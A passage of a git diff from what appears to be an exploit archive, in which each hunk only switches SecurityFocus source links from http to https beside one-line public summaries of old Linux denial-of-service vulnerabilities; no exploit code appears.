+1,4 @@ -source: http://www.securityfocus.com/bid/20920/info +source: https://www.securityfocus.com/bid/20920/info The Linux kernel is prone to a local denial-of-service vulnerability. This issue affects the code that handles the ISO9660 filesystem. diff --git a/exploits/linux/dos/29296.txt b/exploits/linux/dos/29296.txt index 1d56d4724..261b33aed 100644 --- a/exploits/linux/dos/29296.txt +++ b/exploits/linux/dos/29296.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21662/info +source: https://www.securityfocus.com/bid/21662/info KDE libkhtml is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/29399.txt b/exploits/linux/dos/29399.txt index 89338191a..d3c40e856 100644 --- a/exploits/linux/dos/29399.txt +++ b/exploits/linux/dos/29399.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21910/info +source: https://www.securityfocus.com/bid/21910/info Multiple PDF readers are prone to multiple remote buffer-overflow vulnerabilities because the applications fail to bounds-check user-supplied data before copying it into an insufficiently sized buffer. diff --git a/exploits/linux/dos/29458.txt b/exploits/linux/dos/29458.txt index 7adabfa43..db92ee502 100644 --- a/exploits/linux/dos/29458.txt +++ b/exploits/linux/dos/29458.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22054/info +source: https://www.securityfocus.com/bid/22054/info The 'libgtop2' library is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying into an insufficiently sized memory buffer. diff --git a/exploits/linux/dos/29470.txt b/exploits/linux/dos/29470.txt index de501d312..0d83ed8d3 100644 --- a/exploits/linux/dos/29470.txt +++ b/exploits/linux/dos/29470.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22073/info +source: https://www.securityfocus.com/bid/22073/info Oftpd Server is prone to a remote denial-of-service vulnerability because it mishandles unexpected user-supplied input. diff --git a/exploits/linux/dos/29473.txt b/exploits/linux/dos/29473.txt index 7cf503555..c775f385b 100644 --- a/exploits/linux/dos/29473.txt +++ b/exploits/linux/dos/29473.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22079/info +source: https://www.securityfocus.com/bid/22079/info Squid is prone to a remote denial-of-service vulnerability because the proxy server fails to handle certain FTP requests. diff --git a/exploits/linux/dos/29520.txt b/exploits/linux/dos/29520.txt index cf2765fca..e428be751 100644 --- a/exploits/linux/dos/29520.txt +++ b/exploits/linux/dos/29520.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22209/info +source: https://www.securityfocus.com/bid/22209/info Applications using the gtk2 library may be prone to a denial-of-service vulnerability because the library fails to handle malformed image data. diff --git a/exploits/linux/dos/29683.txt b/exploits/linux/dos/29683.txt index da839ef56..de8eb2ba6 100644 --- a/exploits/linux/dos/29683.txt +++ b/exploits/linux/dos/29683.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22737/info +source: https://www.securityfocus.com/bid/22737/info The Linux Kernel is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/29713.html b/exploits/linux/dos/29713.html index 93f14dba3..26822d021 100644 --- a/exploits/linux/dos/29713.html +++ b/exploits/linux/dos/29713.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22814/info +source: https://www.securityfocus.com/bid/22814/info KDE Konqueror is prone to a remote denial-of-service vulnerability because of an error in KDE's JavaScript implementation. diff --git a/exploits/linux/dos/29716.txt b/exploits/linux/dos/29716.txt index b2b64a64a..394f08d71 100644 --- a/exploits/linux/dos/29716.txt +++ b/exploits/linux/dos/29716.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22846/info +source: https://www.securityfocus.com/bid/22846/info SILC Server is prone to a denial-of-service vulnerability because the application fails to handle exceptional conditions. diff --git a/exploits/linux/dos/29717.txt b/exploits/linux/dos/29717.txt index 80c3cef8c..43c9d4087 100644 --- a/exploits/linux/dos/29717.txt +++ b/exploits/linux/dos/29717.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22855/info +source: https://www.securityfocus.com/bid/22855/info Conquest is prone to multiple remotely exploitable vulnerabilities, including a stack-based buffer-overflow vulnerability and a memory-corruption vulnerability. diff --git a/exploits/linux/dos/29720.txt b/exploits/linux/dos/29720.txt index 4c0b7d6f9..e93bb3c15 100644 --- a/exploits/linux/dos/29720.txt +++ b/exploits/linux/dos/29720.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22879/info +source: https://www.securityfocus.com/bid/22879/info Mozilla Firefox is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/29723.txt b/exploits/linux/dos/29723.txt index e718e7abf..2fddbc939 100644 --- a/exploits/linux/dos/29723.txt +++ b/exploits/linux/dos/29723.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22899/info +source: https://www.securityfocus.com/bid/22899/info Firefox is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/29724.txt b/exploits/linux/dos/29724.txt index 149c4f3c6..d8b055b2b 100644 --- a/exploits/linux/dos/29724.txt +++ b/exploits/linux/dos/29724.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22900/info +source: https://www.securityfocus.com/bid/22900/info MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain select statements to database metadata. diff --git a/exploits/linux/dos/29781.c b/exploits/linux/dos/29781.c index fbf6985a6..acec6df2c 100644 --- a/exploits/linux/dos/29781.c +++ b/exploits/linux/dos/29781.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/23142/info +source: https://www.securityfocus.com/bid/23142/info The Linux kernel is prone to a NULL-pointer dereference vulnerability. diff --git a/exploits/linux/dos/29809.txt b/exploits/linux/dos/29809.txt index 3db9cce29..650268816 100644 --- a/exploits/linux/dos/29809.txt +++ b/exploits/linux/dos/29809.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23240/info +source: https://www.securityfocus.com/bid/23240/info PulseAudio is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/29826.txt b/exploits/linux/dos/29826.txt index 496e69f0a..4d63a63dd 100644 --- a/exploits/linux/dos/29826.txt +++ b/exploits/linux/dos/29826.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23376/info +source: https://www.securityfocus.com/bid/23376/info The Linux kernel is prone to a denial-of-service vulnerability. This issue presents itself when malformed AppleTalk frames are processed. diff --git a/exploits/linux/dos/29916.c b/exploits/linux/dos/29916.c index faa0a4058..65c532093 100644 --- a/exploits/linux/dos/29916.c +++ b/exploits/linux/dos/29916.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/23677/info +source: https://www.securityfocus.com/bid/23677/info The Linux kernel is prone to a denial-of-service vulnerability. This issue presents itself when a NETLINK message is misrouted. diff --git a/exploits/linux/dos/29939.txt b/exploits/linux/dos/29939.txt index 98cbb1477..f96931b38 100644 --- a/exploits/linux/dos/29939.txt +++ b/exploits/linux/dos/29939.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23741/info +source: https://www.securityfocus.com/bid/23741/info X.Org X Window System Xserver is prone to a denial-of-service vulnerabilty because the software fails to properly handle exceptional conditions. diff --git a/exploits/linux/dos/30020.txt b/exploits/linux/dos/30020.txt index b64023d3b..11d996434 100644 --- a/exploits/linux/dos/30020.txt +++ b/exploits/linux/dos/30020.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23911/info +source: https://www.securityfocus.com/bid/23911/info MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain specially crafted queries. diff --git a/exploits/linux/dos/30024.txt b/exploits/linux/dos/30024.txt index c9584a5f5..5fc5efe33 100644 --- a/exploits/linux/dos/30024.txt +++ b/exploits/linux/dos/30024.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23927/info +source: https://www.securityfocus.com/bid/23927/info The libexif library is prone to an integer-overflow vulnerability because the software fails to properly ensure that integer math operations do not result in overflows. diff --git a/exploits/linux/dos/30080.c b/exploits/linux/dos/30080.c index 4e818c8b6..4a36c0249 100644 --- a/exploits/linux/dos/30080.c +++ b/exploits/linux/dos/30080.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/24134/info +source: https://www.securityfocus.com/bid/24134/info The Linux Kernel is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/30091.py b/exploits/linux/dos/30091.py index 9c5af31bd..b5ffdaa85 100755 --- a/exploits/linux/dos/30091.py +++ b/exploits/linux/dos/30091.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24186/info +source: https://www.securityfocus.com/bid/24186/info The OpenOffice 'Writer' component is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/30110.c b/exploits/linux/dos/30110.c index 864305438..4c549ac08 100644 --- a/exploits/linux/dos/30110.c +++ b/exploits/linux/dos/30110.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24246/info +// source: https://www.securityfocus.com/bid/24246/info Bochs is prone to a heap-based buffer-overflow issue and a denial-of-service issue. The buffer-overflow issue occurs because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized memory buffer. The denial-of-service vulnerability is caused by a divide-by-zero operation. diff --git a/exploits/linux/dos/30251.c b/exploits/linux/dos/30251.c index 3c4e44bbf..6022674cf 100644 --- a/exploits/linux/dos/30251.c +++ b/exploits/linux/dos/30251.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24651/info +// source: https://www.securityfocus.com/bid/24651/info The GD graphics library is prone to multiple vulnerabilities. diff --git a/exploits/linux/dos/30430.txt b/exploits/linux/dos/30430.txt index f871d545a..00847698d 100644 --- a/exploits/linux/dos/30430.txt +++ b/exploits/linux/dos/30430.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25117/info +source: https://www.securityfocus.com/bid/25117/info Fail2ban is prone to a remote denial-of-service vulnerability because the application fails to properly ensure the validity of authentication-failure messages. diff --git a/exploits/linux/dos/30444.txt b/exploits/linux/dos/30444.txt index a17d0f441..7cc970cde 100644 --- a/exploits/linux/dos/30444.txt +++ b/exploits/linux/dos/30444.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25170/info +source: https://www.securityfocus.com/bid/25170/info KDE Konqueror is prone to a remote denial-of-service vulnerability because it fails to handle improperly formated HTML code. diff --git a/exploits/linux/dos/30542.txt b/exploits/linux/dos/30542.txt index ccacc8446..b173d7653 100644 --- a/exploits/linux/dos/30542.txt +++ b/exploits/linux/dos/30542.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25481/info +source: https://www.securityfocus.com/bid/25481/info EnterpriseDB Advanced Server is prone to an uninitialized-pointer vulnerability. diff --git a/exploits/linux/dos/30578.txt b/exploits/linux/dos/30578.txt index b7058ad52..9e63b04b4 100644 --- a/exploits/linux/dos/30578.txt +++ b/exploits/linux/dos/30578.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25648/info +source: https://www.securityfocus.com/bid/25648/info MPlayer is prone to a heap-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input data. diff --git a/exploits/linux/dos/30579.txt b/exploits/linux/dos/30579.txt index a5c304fa0..8cbd6fca4 100644 --- a/exploits/linux/dos/30579.txt +++ b/exploits/linux/dos/30579.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25650/info +source: https://www.securityfocus.com/bid/25650/info Media Player Classic (MPC) is prone to multiple remote vulnerabilities, including a heap-based buffer-overflow issue and an integer-overflow issue, when handling malformed AVI files. diff --git a/exploits/linux/dos/30580.txt b/exploits/linux/dos/30580.txt index 35e368854..b7a128686 100644 --- a/exploits/linux/dos/30580.txt +++ b/exploits/linux/dos/30580.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25651/info +source: https://www.securityfocus.com/bid/25651/info KMPlayer is prone to multiple denial-of-service vulnerabilities when handling malformed AVI media files. diff --git a/exploits/linux/dos/30584.py b/exploits/linux/dos/30584.py index 4dd78e143..a3e857c36 100755 --- a/exploits/linux/dos/30584.py +++ b/exploits/linux/dos/30584.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25676/info +source: https://www.securityfocus.com/bid/25676/info Boa is prone to an authentication-bypass vulnerability because the application fails to ensure that passwords are not overwritten by specially crafted HTTP Requests. diff --git a/exploits/linux/dos/30646.txt b/exploits/linux/dos/30646.txt index 575dc1e21..30d76486b 100644 --- a/exploits/linux/dos/30646.txt +++ b/exploits/linux/dos/30646.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25952/info +source: https://www.securityfocus.com/bid/25952/info Nagios Plugins are prone to a remote buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer. diff --git a/exploits/linux/dos/30648.txt b/exploits/linux/dos/30648.txt index 022ab4061..897f90c1d 100644 --- a/exploits/linux/dos/30648.txt +++ b/exploits/linux/dos/30648.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25969/info +source: https://www.securityfocus.com/bid/25969/info AlsaPlayer is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer. diff --git a/exploits/linux/dos/30724.txt b/exploits/linux/dos/30724.txt index 573f7afd1..ab67e1082 100644 --- a/exploits/linux/dos/30724.txt +++ b/exploits/linux/dos/30724.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26270/info +source: https://www.securityfocus.com/bid/26270/info Perdition IMAP proxy server is prone to a remote format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function. diff --git a/exploits/linux/dos/30744.txt b/exploits/linux/dos/30744.txt index 321cbc80a..89675a1d3 100644 --- a/exploits/linux/dos/30744.txt +++ b/exploits/linux/dos/30744.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26353/info +source: https://www.securityfocus.com/bid/26353/info MySQL is prone to a remote denial-of-service vulnerability because the database server fails to properly handle unexpected input. diff --git a/exploits/linux/dos/30763.php b/exploits/linux/dos/30763.php index dcd61d51f..a32c60e58 100644 --- a/exploits/linux/dos/30763.php +++ b/exploits/linux/dos/30763.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26435/info +source: https://www.securityfocus.com/bid/26435/info KDE Konqueror is prone to a remote denial-of-service vulnerability because it fails to handle overly large cookies. diff --git a/exploits/linux/dos/30766.c b/exploits/linux/dos/30766.c index 771fe3748..381aaefc9 100644 --- a/exploits/linux/dos/30766.c +++ b/exploits/linux/dos/30766.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26445/info +// source: https://www.securityfocus.com/bid/26445/info GNU's tar and cpio utilities are prone to a denial-of-service vulnerability because of insecure use of the 'alloca()' function. diff --git a/exploits/linux/dos/30776.txt b/exploits/linux/dos/30776.txt index 0158cce5e..cdb118766 100644 --- a/exploits/linux/dos/30776.txt +++ b/exploits/linux/dos/30776.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26488/info +source: https://www.securityfocus.com/bid/26488/info LIVE555 Media Server is prone to a remote denial-of-service vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/linux/dos/30837.txt b/exploits/linux/dos/30837.txt index 62859e2f4..5b2c73291 100644 --- a/exploits/linux/dos/30837.txt +++ b/exploits/linux/dos/30837.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26666/info +source: https://www.securityfocus.com/bid/26666/info QEMU is prone to a local denial-of-service vulnerability because it fails to perform adequate boundary checks when handling user-supplied input. diff --git a/exploits/linux/dos/30894.txt b/exploits/linux/dos/30894.txt index 4811a040e..7dccd8fec 100644 --- a/exploits/linux/dos/30894.txt +++ b/exploits/linux/dos/30894.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26899/info +source: https://www.securityfocus.com/bid/26899/info PeerCast is prone to multiple buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer. diff --git a/exploits/linux/dos/30895.pl b/exploits/linux/dos/30895.pl index 4a3104f18..305bc3824 100755 --- a/exploits/linux/dos/30895.pl +++ b/exploits/linux/dos/30895.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26902/info +source: https://www.securityfocus.com/bid/26902/info The Perl Net::DNS module is prone to a remote denial-of-service vulnerability because the module fails to properly handle malformed DNS responses. diff --git a/exploits/linux/dos/30898.pl b/exploits/linux/dos/30898.pl index 162d8aa2f..c67128ce3 100755 --- a/exploits/linux/dos/30898.pl +++ b/exploits/linux/dos/30898.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26917/info +source: https://www.securityfocus.com/bid/26917/info Common UNIX Printing System (CUPS) is prone to a remote buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer. diff --git a/exploits/linux/dos/30902.c b/exploits/linux/dos/30902.c index c6f3e0a54..b740c2dee 100644 --- a/exploits/linux/dos/30902.c +++ b/exploits/linux/dos/30902.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/26943/info +source: https://www.securityfocus.com/bid/26943/info The Linux kernel is prone to a remote denial-of-service vulnerability because it fails to adequately validate specially crafted IPv6 'Hop-By-Hop' headers. diff --git a/exploits/linux/dos/30942.c b/exploits/linux/dos/30942.c index 417aac49e..02c8f4a59 100644 --- a/exploits/linux/dos/30942.c +++ b/exploits/linux/dos/30942.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27047/info +// source: https://www.securityfocus.com/bid/27047/info Extended Module Player (xmp) is prone to multiple local buffer-overflow vulnerabilities because it fails to perform adequate boundary checks before copying user-supplied input into an insufficiently sized buffer. diff --git a/exploits/linux/dos/30956.txt b/exploits/linux/dos/30956.txt index 0e53f6b45..75b56f074 100644 --- a/exploits/linux/dos/30956.txt +++ b/exploits/linux/dos/30956.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27061/info +source: https://www.securityfocus.com/bid/27061/info CoolPlayer is prone a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/dos/30985.txt b/exploits/linux/dos/30985.txt index 868a9ce39..293a99a2f 100644 --- a/exploits/linux/dos/30985.txt +++ b/exploits/linux/dos/30985.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27131/info +source: https://www.securityfocus.com/bid/27131/info The GNU Compact Disc Input and Control Library ('libcdio') is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/dos/31002.txt b/exploits/linux/dos/31002.txt index 3f2bf6f63..7dcc4cf29 100644 --- a/exploits/linux/dos/31002.txt +++ b/exploits/linux/dos/31002.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27198/info +source: https://www.securityfocus.com/bid/27198/info The xine-lib library is prone to a remote heap-based buffer-overflow vulnerability. This issue occurs because the software fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/dos/31018.txt b/exploits/linux/dos/31018.txt index 161fc113d..8fdb39989 100644 --- a/exploits/linux/dos/31018.txt +++ b/exploits/linux/dos/31018.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27249/info +source: https://www.securityfocus.com/bid/27249/info GStreamer is prone to multiple unspecified denial-of-service vulnerabilities when handling malformed media files. diff --git a/exploits/linux/dos/31054.txt b/exploits/linux/dos/31054.txt index d220ee2ea..67584e215 100644 --- a/exploits/linux/dos/31054.txt +++ b/exploits/linux/dos/31054.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27417/info +source: https://www.securityfocus.com/bid/27417/info The SDL_image library is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. The issue occurs when handling malformed GIF images. diff --git a/exploits/linux/dos/31218.txt b/exploits/linux/dos/31218.txt index 48ab37108..2757d2ce1 100644 --- a/exploits/linux/dos/31218.txt +++ b/exploits/linux/dos/31218.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27845/info +source: https://www.securityfocus.com/bid/27845/info freeSSHd is prone to a remote denial-of-service vulnerability because it fails to handle exceptional conditions. diff --git a/exploits/linux/dos/31440.txt b/exploits/linux/dos/31440.txt index 118a37fdb..646b2141c 100644 --- a/exploits/linux/dos/31440.txt +++ b/exploits/linux/dos/31440.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28308/info +source: https://www.securityfocus.com/bid/28308/info Asterisk is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data before copying it to insufficiently sized buffers. diff --git a/exploits/linux/dos/31444.txt b/exploits/linux/dos/31444.txt index d48027492..e435ebc16 100644 --- a/exploits/linux/dos/31444.txt +++ b/exploits/linux/dos/31444.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28351/info +source: https://www.securityfocus.com/bid/28351/info MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain specially crafted queries. diff --git a/exploits/linux/dos/31552.txt b/exploits/linux/dos/31552.txt index f80782c83..da675bfdc 100644 --- a/exploits/linux/dos/31552.txt +++ b/exploits/linux/dos/31552.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28485/info +source: https://www.securityfocus.com/bid/28485/info Wireshark is prone to multiple denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/31553.txt b/exploits/linux/dos/31553.txt index 29516bf5b..3cf080cae 100644 --- a/exploits/linux/dos/31553.txt +++ b/exploits/linux/dos/31553.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28485/info +source: https://www.securityfocus.com/bid/28485/info Wireshark is prone to multiple denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/31554.txt b/exploits/linux/dos/31554.txt index 6e162ac7d..a606cbde8 100644 --- a/exploits/linux/dos/31554.txt +++ b/exploits/linux/dos/31554.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28485/info +source: https://www.securityfocus.com/bid/28485/info Wireshark is prone to multiple denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/31594.html b/exploits/linux/dos/31594.html index 99efe452c..44ab33ea3 100644 --- a/exploits/linux/dos/31594.html +++ b/exploits/linux/dos/31594.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28585/info +source: https://www.securityfocus.com/bid/28585/info Opera Web Browser is prone to multiple security vulnerabilities that may allow remote attackers to execute code. diff --git a/exploits/linux/dos/31713.py b/exploits/linux/dos/31713.py index 35056f0e8..88c47c7d1 100755 --- a/exploits/linux/dos/31713.py +++ b/exploits/linux/dos/31713.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28986/info +source: https://www.securityfocus.com/bid/28986/info PeerCast is prone to multiple buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer. diff --git a/exploits/linux/dos/31815.html b/exploits/linux/dos/31815.html index 80cdfbe27..991b9dff1 100644 --- a/exploits/linux/dos/31815.html +++ b/exploits/linux/dos/31815.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29312/info +source: https://www.securityfocus.com/bid/29312/info The 'libxslt' library is prone to a buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/dos/31965.c b/exploits/linux/dos/31965.c index 45fb22723..28a924538 100644 --- a/exploits/linux/dos/31965.c +++ b/exploits/linux/dos/31965.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/29945/info +source: https://www.securityfocus.com/bid/29945/info The Linux kernel is prone to a local denial-of-service vulnerability caused by a race condition. diff --git a/exploits/linux/dos/31966.c b/exploits/linux/dos/31966.c index ba82c41b3..241c0d62a 100644 --- a/exploits/linux/dos/31966.c +++ b/exploits/linux/dos/31966.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/29945/info +source: https://www.securityfocus.com/bid/29945/info The Linux kernel is prone to a local denial-of-service vulnerability caused by a race condition. diff --git a/exploits/linux/dos/31968.txt b/exploits/linux/dos/31968.txt index b89451f48..496b7fca5 100644 --- a/exploits/linux/dos/31968.txt +++ b/exploits/linux/dos/31968.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29958/info +source: https://www.securityfocus.com/bid/29958/info GNOME Rhythmbox is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted input. diff --git a/exploits/linux/dos/31979.html b/exploits/linux/dos/31979.html index 71494b5ca..b8df8b7cf 100644 --- a/exploits/linux/dos/31979.html +++ b/exploits/linux/dos/31979.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29961/info +source: https://www.securityfocus.com/bid/29961/info GNOME Evolution is prone to a denial-of-service vulnerability when handling email messages that contain specially crafted HTML. diff --git a/exploits/linux/dos/31984.txt b/exploits/linux/dos/31984.txt index 6f807e5fa..817c3a3b5 100644 --- a/exploits/linux/dos/31984.txt +++ b/exploits/linux/dos/31984.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29984/info +source: https://www.securityfocus.com/bid/29984/info Mozilla Firefox is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/32000.txt b/exploits/linux/dos/32000.txt index de81d913b..685ea6435 100644 --- a/exploits/linux/dos/32000.txt +++ b/exploits/linux/dos/32000.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30013/info +source: https://www.securityfocus.com/bid/30013/info OpenLDAP is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/32018.txt b/exploits/linux/dos/32018.txt index cba915b94..01504384c 100644 --- a/exploits/linux/dos/32018.txt +++ b/exploits/linux/dos/32018.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30149/info +source: https://www.securityfocus.com/bid/30149/info Multiple vendors' SVG implementations are prone to an unspecified denial-of-service vulnerability. diff --git a/exploits/linux/dos/32019.txt b/exploits/linux/dos/32019.txt index 762af6cc7..a579440ec 100644 --- a/exploits/linux/dos/32019.txt +++ b/exploits/linux/dos/32019.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30154/info +source: https://www.securityfocus.com/bid/30154/info The 'libavformat' library from FFmpeg is prone to a remote heap-based buffer-overflow vulnerability because of insufficient boundary checks when parsing STR data. diff --git a/exploits/linux/dos/32095.pl b/exploits/linux/dos/32095.pl index e1e3b06db..8db8745e4 100755 --- a/exploits/linux/dos/32095.pl +++ b/exploits/linux/dos/32095.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30321/info +source: https://www.securityfocus.com/bid/30321/info Asterisk is prone to a remote denial-of-service vulnerability because it fails to handle multiple 'POKE' requests in quick succession. diff --git a/exploits/linux/dos/32112.txt b/exploits/linux/dos/32112.txt index d51a6c522..0fd4110dd 100644 --- a/exploits/linux/dos/32112.txt +++ b/exploits/linux/dos/32112.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30357/info +source: https://www.securityfocus.com/bid/30357/info Minix is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/32248.txt b/exploits/linux/dos/32248.txt index 9677a0705..7123e0e5d 100644 --- a/exploits/linux/dos/32248.txt +++ b/exploits/linux/dos/32248.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30690/info +source: https://www.securityfocus.com/bid/30690/info Yelp is prone to a remote format-string vulnerability because the application fails to properly sanitize user-supplied input before including it in the format-specifier argument of a formatted-printing function. diff --git a/exploits/linux/dos/32292.rb b/exploits/linux/dos/32292.rb index 804c05098..cd3db4e7f 100755 --- a/exploits/linux/dos/32292.rb +++ b/exploits/linux/dos/32292.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30802/info +source: https://www.securityfocus.com/bid/30802/info Ruby is prone to a remote denial-of-service vulnerability in its REXML module. diff --git a/exploits/linux/dos/32304.txt b/exploits/linux/dos/32304.txt index d88f063a8..74cdb8e26 100644 --- a/exploits/linux/dos/32304.txt +++ b/exploits/linux/dos/32304.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30871/info +source: https://www.securityfocus.com/bid/30871/info Red Hat Directory Server is prone to a denial-of-service vulnerability because the server fails to handle specially crafted search patterns. diff --git a/exploits/linux/dos/32348.txt b/exploits/linux/dos/32348.txt index 9041900c1..c436b668c 100644 --- a/exploits/linux/dos/32348.txt +++ b/exploits/linux/dos/32348.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31081/info +source: https://www.securityfocus.com/bid/31081/info MySQL is prone to a remote denial-of-service vulnerability because it fails to handle empty binary string literals. diff --git a/exploits/linux/dos/32384.txt b/exploits/linux/dos/32384.txt index e1f949e96..2344f536e 100644 --- a/exploits/linux/dos/32384.txt +++ b/exploits/linux/dos/32384.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31201/info +source: https://www.securityfocus.com/bid/31201/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/32451.txt b/exploits/linux/dos/32451.txt index 2a0c074a3..93cd8cd16 100644 --- a/exploits/linux/dos/32451.txt +++ b/exploits/linux/dos/32451.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31536/info +source: https://www.securityfocus.com/bid/31536/info Fedora 8 and 9 Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/32452.txt b/exploits/linux/dos/32452.txt index 8bb1bf2df..60c6d00a7 100644 --- a/exploits/linux/dos/32452.txt +++ b/exploits/linux/dos/32452.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31537/info +source: 